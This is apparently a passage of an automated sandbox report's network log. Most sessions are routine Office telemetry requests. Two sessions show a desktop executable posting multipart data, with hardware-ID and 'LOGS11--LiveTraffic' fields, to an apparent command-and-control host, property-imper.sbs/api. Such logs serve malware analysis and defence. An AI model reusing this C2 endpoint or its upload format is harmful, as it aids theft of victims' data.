                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  7192.168.2.74970513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:22 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 450
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                  ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                  x-ms-request-id: 3ae325a6-f01e-001f-6051-3c5dc8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185223Z-15b8b599d88wk8w4hC1TEB14b800000003a000000000fpfh
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:23 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  8192.168.2.74970613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:23 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2160
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                  x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185223Z-178bfbc474bw8bwphC1NYC38b400000004kg00000000n1ac
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:23 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  9192.168.2.749715104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=KXOL1U91M
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 15028
                                                                                                                                                                                  Host: property-imper.sbs
                                                                                                                                                                                  2024-11-23 18:52:25 UTC15028OUTData Raw: 2d 2d 4b 58 4f 4c 31 55 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 43 34 33 42 39 38 37 42 32 38 45 37 34 32 44 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4b 58 4f 4c 31 55 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 58 4f 4c 31 55 39 31 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 58 4f 4c 31 55 39 31 4d 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                  Data Ascii: --KXOL1U91MContent-Disposition: form-data; name="hwid"0C43B987B28E742DD7CBBD6DF28D3732--KXOL1U91MContent-Disposition: form-data; name="pid"2--KXOL1U91MContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KXOL1U91MConten
                                                                                                                                                                                  2024-11-23 18:52:25 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Set-Cookie: PHPSESSID=1rcpom9pklpc365icju0g50rra; expires=Wed, 19-Mar-2025 12:39:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gpYacAvAG6AftUEtzsfIME%2BSkpplwXUAW%2B5XNjkYl4MNDud1eJSb2SsujnwKMR1DuCKabHlqdgS69sc8BxZPsilTqULcwKpMAzyDm5a0%2FgNpjIoPfdhjw5WiHLVVfSUgjBSkBtY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8e735b31d979c44d-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1676&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15961&delivery_rate=1671436&cwnd=250&unsent_bytes=0&cid=7b9181238c1078fa&ts=914&x=0"
                                                                                                                                                                                  2024-11-23 18:52:25 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                  Data Ascii: eok 8.46.123.75
                                                                                                                                                                                  2024-11-23 18:52:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  10192.168.2.74971113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                  x-ms-request-id: 30601852-401e-0047-7476-3b8597000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185225Z-174c587ffdf4zw2thC1TEBu34000000003b000000000kg4c
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  11192.168.2.74971313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 632
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                  x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185225Z-178bfbc474bxkclvhC1NYC69g400000004wg000000002f38
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:25 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  12192.168.2.74971213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                  x-ms-request-id: 3e5933f5-801e-00ac-572e-3cfd65000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185225Z-178bfbc474bbcwv4hC1NYCypys00000004rg000000007ucv
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  13192.168.2.74971013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9964B277"
                                                                                                                                                                                  x-ms-request-id: 657d02d2-201e-0033-2f57-3cb167000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185225Z-178bfbc474bv7whqhC1NYC1fg400000004w0000000009k60
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:25 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  14192.168.2.74971413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:25 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 467
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                  x-ms-request-id: ae573645-101e-008d-516d-3b92e5000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185225Z-174c587ffdf89smkhC1TEB697s000000039g00000000qcbg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:25 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  15192.168.2.74971613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 407
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                  x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185227Z-174c587ffdfldtt2hC1TEBwv9c000000034g00000000e24a
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:27 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  16192.168.2.749721104.21.33.1164436908C:\Users\user\Desktop\file.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:27 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=QVGWZGRC
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                  Content-Length: 20347
                                                                                                                                                                                  Host: property-imper.sbs
